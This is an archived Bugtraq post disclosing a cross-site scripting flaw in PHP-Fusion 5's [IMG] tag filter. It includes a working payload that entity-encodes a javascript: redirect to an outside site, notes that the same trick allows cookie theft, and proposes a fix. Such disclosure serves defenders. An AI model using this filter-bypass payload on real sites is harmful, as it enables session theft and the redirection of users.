PHP-FUSION 5.* XSS VULNERABILITY

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP-FUSION 5.* XSS VULNERABILITY
From: FireSt0rm <firest0rm.uh@xxxxxxxxx>
Date: 6 Mar 2005 16:58:45 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


I found an exploit in the current version of php-fusion which allows you to 
input XSS in the [IMG] tag. I reported it already to php-fusion and they 
created a fix for this. Here it goes:

By converting the text (ie. javascript:alert('test')) to their ascii values, 
the strings between the [img][/img] tags aren't checked by the filter. And this 
way, you can send it and it will be executed.

You can do other things like display cookies, steal cookies, redirections etc.

EXAMPLE:

[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]

would be replaced by

[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&#101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG]

FIX:

Filter out characters like '&' and '#'.

Prev by Date: phpBB 2.0.13 - user level exploit
Next by Date: drone armies C&C report - Feb/2005
Previous by thread: phpBB 2.0.13 - user level exploit
Next by thread: drone armies C&C report - Feb/2005
Index(es):
- Date
- Thread